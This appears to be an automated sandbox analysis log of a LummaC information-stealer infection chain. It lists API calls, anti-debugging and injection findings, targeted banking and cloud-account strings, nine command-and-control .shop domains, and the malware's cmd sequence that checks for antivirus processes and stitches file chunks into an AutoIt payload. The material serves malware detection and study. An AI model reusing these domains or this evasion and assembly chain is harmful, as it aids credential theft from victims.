Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0009FA36
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0009C2FF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009CD14 FindFirstFileW,FindClose,	19_2_0009CD14
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0009CD9F
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0009F5D8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0009F735
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00093CE2
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00094005
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0009C2FF
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,	23_2_0009494A
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009CD14 FindFirstFileW,FindClose,	23_2_0009CD14
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	23_2_0009CD9F
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0009F5D8
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0009F735
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0009FA36
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00093CE2

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_0088C8D5 VirtualQuery,GetSystemInfo,

4_2_0088C8D5

Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Dicks.pif, 00000017.00000002.3265878454.000000000112B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh[
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Dicks.pif, 00000017.00000003.3167767357.0000000003460000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Dicks.pif, 00000013.00000003.3131838232.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3062949485.0000000002375000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3063600220.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3063404315.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3134985535.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000002.3141217970.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3073308414.0000000002382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: MSI53B9.tmp, 00000004.00000003.2491927351.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: MSI53B9.tmp, 00000004.00000003.2491927351.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\c(
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Dicks.pif, 00000017.00000003.3180108390.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196148648.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

API call chain: ExitProcess graph end node

graph_4-23563

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_19-98601

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 23_2_00E98990 LdrInitializeThunk,

23_2_00E98990

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000A45D5 BlockInput,

19_2_000A45D5

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0088DA75

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00065CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_00065CAC

Source: C:\Users\user\Desktop\SymposiumTaiwan.exe

Code function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00406328

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_00894A5A mov eax, dword ptr fs:[00000030h]

4_2_00894A5A

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_00898AAA GetProcessHeap,

4_2_00898AAA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0088DA75
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088DBC3 SetUnhandledExceptionFilter,	4_2_0088DBC3
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_00895B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00895B53
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Code function: 4_2_0088DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0088DD7C
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005A354 SetUnhandledExceptionFilter,	19_2_0005A354
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 19_2_0005A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0005A385
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005A354 SetUnhandledExceptionFilter,	23_2_0005A354
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Code function: 23_2_0005A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0005A385

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Memory written: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif base: E60000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Dicks.pif, 00000013.00000003.3062971352.0000000004251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop
Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: warrantelespsz.shop

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00089369 LogonUserW,

19_2_00089369

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00045240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00045240

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00091AC6 SendInput,keybd_event,

19_2_00091AC6

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000951E2 mouse_event,

19_2_000951E2

Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp	Process created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SymposiumTaiwan.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\k	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Process created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_000888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_000888CD

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00094F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00094F1C

Source: Dicks.pif, 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3265336651.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Dicks.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_0088D8CB cpuid

4_2_0088D8CB

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_0088932F

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_0088C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

4_2_0088C131

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_00070722 GetUserNameW,

19_2_00070722

Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Code function: 19_2_0006416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_0006416A

Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp

Code function: 4_2_0087A8E0 GetVersionExW,

4_2_0087A8E0

